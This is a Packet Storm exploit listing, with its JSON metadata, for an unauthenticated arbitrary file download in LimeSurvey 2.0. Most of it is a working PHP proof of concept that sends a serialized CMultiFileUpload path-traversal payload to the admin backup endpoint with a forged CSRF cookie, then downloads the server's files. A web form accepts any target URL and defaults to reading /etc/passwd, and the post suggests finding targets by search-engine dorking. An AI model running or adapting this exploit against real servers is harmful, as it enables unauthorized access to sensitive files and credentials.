📄 Limesurvey 2.0 Arbitrary File Download_PACKETSTORM:213291

Description

Limesurvey version 2.0 unauthenticated arbitrary file download proof of concept exploit...

Basic Information

ID PACKETSTORM:213291

Published Dec 24, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Limesurvey 2.0 unauthenticated file download vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.limesurvey.org/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This script exploits the unauthenticated file upload vulnerability in LimeSurvey, which allows an attacker to download any file from the targeted server.

(linked: https://packetstorm.news/files/id/180855/ Linked CVE numbers: ),

[+] save code as poc.php.

[+] USage : http://127.0.0.1/poc.php

[+] PayLoad :

<?php

class LimeSurveyExploit {
private $target;
private $filepath;
private $traversalDepth;

public function __construct($target, $filepath = '/etc/passwd', $traversalDepth = 15) {
$this->target = rtrim($target, '/');
$this->filepath = $filepath;
$this->traversalDepth = $traversalDepth;
}

private function generatePayload() {
$traversal = str_repeat('/..', $this->traversalDepth);
$file = $traversal . $this->filepath;
$serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' . strlen($file) . ':"' . $file . '";}}';
return base64_encode($serialized);
}

public function execute() {
$csrf_token = bin2hex(random_bytes(5));
$postFields = [
'YII_CSRF_TOKEN' => $csrf_token,
'destinationBuild' => bin2hex(random_bytes(3)),
'datasupdateinfo' => $this->generatePayload()
];

$response = $this->sendRequest("{$this->target}/index.php/admin/update/sa/backup", $postFields, $csrf_token);

if ($response && strpos($response, 'Download this file') !== false) {
if (preg_match('/<a class="btn btn-success" href="([^"]+)" title="Download this file">/', $response, $matches)) {
$downloadUrl = $matches[1];
echo "Downloading backup from URL: $downloadUrl\n";
$this->downloadFile($downloadUrl);
} else {
echo "Failed to extract download link.\n";
}
} else {
echo "Failed to exploit the vulnerability.\n";
}
}

private function sendRequest($url, $postFields, $csrf_token) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postFields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: YII_CSRF_TOKEN=$csrf_token"]);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function downloadFile($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);

if ($data) {
$zipFile = 'downloaded.zip';
file_put_contents($zipFile, $data);
echo "File downloaded successfully: $zipFile\n";
$this->extractZip($zipFile);
} else {
echo "Failed to download file.\n";
}
}

private function extractZip($zipFile) {
$zip = new ZipArchive;
if ($zip->open($zipFile) === TRUE) {
$zip->extractTo('./extracted/');
$zip->close();
echo "Files extracted to ./extracted/\n";
} else {
echo "Failed to extract ZIP file.\n";
}
}
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$target = $_POST['target'];
$filepath = $_POST['filepath'];
$exploit = new LimeSurveyExploit($target, $filepath);
$exploit->execute();
}
?>

<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>استغلال LimeSurvey</title>
</head>
<body>
<h2>استغلال تحميل الملفات غير الموثق - LimeSurvey</h2>
<form method="POST">
<label>عنوان الموقع المستهدف:</label>
<input type="text" name="target" required><br>
<label>المسار المطلوب:</label>
<input type="text" name="filepath" value="/etc/passwd" required><br>
<button type="submit">تنفيذ</button>
</form>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-24T16:35:04",
    "description": "Limesurvey version 2.0 unauthenticated arbitrary file download proof of concept exploit...",
    "published": "2025-12-24T00:00:00",
    "modified": "2025-12-24T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Limesurvey 2.0 Arbitrary File Download",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213291",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Limesurvey 2.0 unauthenticated file download vulnerability                                                                  |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.limesurvey.org/                                                                                                 |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: This script exploits the unauthenticated file upload vulnerability in LimeSurvey, which allows an attacker to download any file from the targeted server.\n       \n       (linked: https://packetstorm.news/files/id/180855/ Linked CVE numbers: ),\n    \t\n    [+] save code as poc.php.\n    \n    [+] USage : http://127.0.0.1/poc.php \n    \n    [+] PayLoad :\n    \n    <?php\n    \n    class LimeSurveyExploit {\n        private $target;\n        private $filepath;\n        private $traversalDepth;\n    \n        public function __construct($target, $filepath = '/etc/passwd', $traversalDepth = 15) {\n            $this->target = rtrim($target, '/');\n            $this->filepath = $filepath;\n            $this->traversalDepth = $traversalDepth;\n        }\n    \n        private function generatePayload() {\n            $traversal = str_repeat('/..', $this->traversalDepth);\n            $file = $traversal . $this->filepath;\n            $serialized = 'a:1:{i:0;O:16:\"CMultiFileUpload\":1:{s:4:\"file\";s:' . strlen($file) . ':\"' . $file . '\";}}';\n            return base64_encode($serialized);\n        }\n    \n        public function execute() {\n            $csrf_token = bin2hex(random_bytes(5));\n            $postFields = [\n                'YII_CSRF_TOKEN' => $csrf_token,\n                'destinationBuild' => bin2hex(random_bytes(3)),\n                'datasupdateinfo' => $this->generatePayload()\n            ];\n    \n            $response = $this->sendRequest(\"{$this->target}/index.php/admin/update/sa/backup\", $postFields, $csrf_token);\n    \n            if ($response && strpos($response, 'Download this file') !== false) {\n                if (preg_match('/<a class=\"btn btn-success\" href=\"([^\"]+)\" title=\"Download this file\">/', $response, $matches)) {\n                    $downloadUrl = $matches[1];\n                    echo \"Downloading backup from URL: $downloadUrl\\n\";\n                    $this->downloadFile($downloadUrl);\n                } else {\n                    echo \"Failed to extract download link.\\n\";\n                }\n            } else {\n                echo \"Failed to exploit the vulnerability.\\n\";\n            }\n        }\n    \n        private function sendRequest($url, $postFields, $csrf_token) {\n            $ch = curl_init();\n            curl_setopt($ch, CURLOPT_URL, $url);\n            curl_setopt($ch, CURLOPT_POST, true);\n            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postFields));\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            curl_setopt($ch, CURLOPT_HTTPHEADER, [\"Cookie: YII_CSRF_TOKEN=$csrf_token\"]);\n            $response = curl_exec($ch);\n            curl_close($ch);\n            return $response;\n        }\n    \n        private function downloadFile($url) {\n            $ch = curl_init();\n            curl_setopt($ch, CURLOPT_URL, $url);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            $data = curl_exec($ch);\n            curl_close($ch);\n    \n            if ($data) {\n                $zipFile = 'downloaded.zip';\n                file_put_contents($zipFile, $data);\n                echo \"File downloaded successfully: $zipFile\\n\";\n                $this->extractZip($zipFile);\n            } else {\n                echo \"Failed to download file.\\n\";\n            }\n        }\n    \n        private function extractZip($zipFile) {\n            $zip = new ZipArchive;\n            if ($zip->open($zipFile) === TRUE) {\n                $zip->extractTo('./extracted/');\n                $zip->close();\n                echo \"Files extracted to ./extracted/\\n\";\n            } else {\n                echo \"Failed to extract ZIP file.\\n\";\n            }\n        }\n    }\n    \n    if ($_SERVER['REQUEST_METHOD'] === 'POST') {\n        $target = $_POST['target'];\n        $filepath = $_POST['filepath'];\n        $exploit = new LimeSurveyExploit($target, $filepath);\n        $exploit->execute();\n    }\n    ?>\n    \n    <!DOCTYPE html>\n    <html lang=\"ar\">\n    <head>\n        <meta charset=\"UTF-8\">\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n        <title>\u0627\u0633\u062a\u063a\u0644\u0627\u0644 LimeSurvey</title>\n    </head>\n    <body>\n        <h2>\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0645\u0648\u062b\u0642 - LimeSurvey</h2>\n        <form method=\"POST\">\n            <label>\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0645\u0648\u0642\u0639 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641:</label>\n            <input type=\"text\" name=\"target\" required><br>\n            <label>\u0627\u0644\u0645\u0633\u0627\u0631 \u0627\u0644\u0645\u0637\u0644\u0648\u0628:</label>\n            <input type=\"text\" name=\"filepath\" value=\"/etc/passwd\" required><br>\n            <button type=\"submit\">\u062a\u0646\u0641\u064a\u0630</button>\n        </form>\n    </body>\n    </html>\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213291",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/213291/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply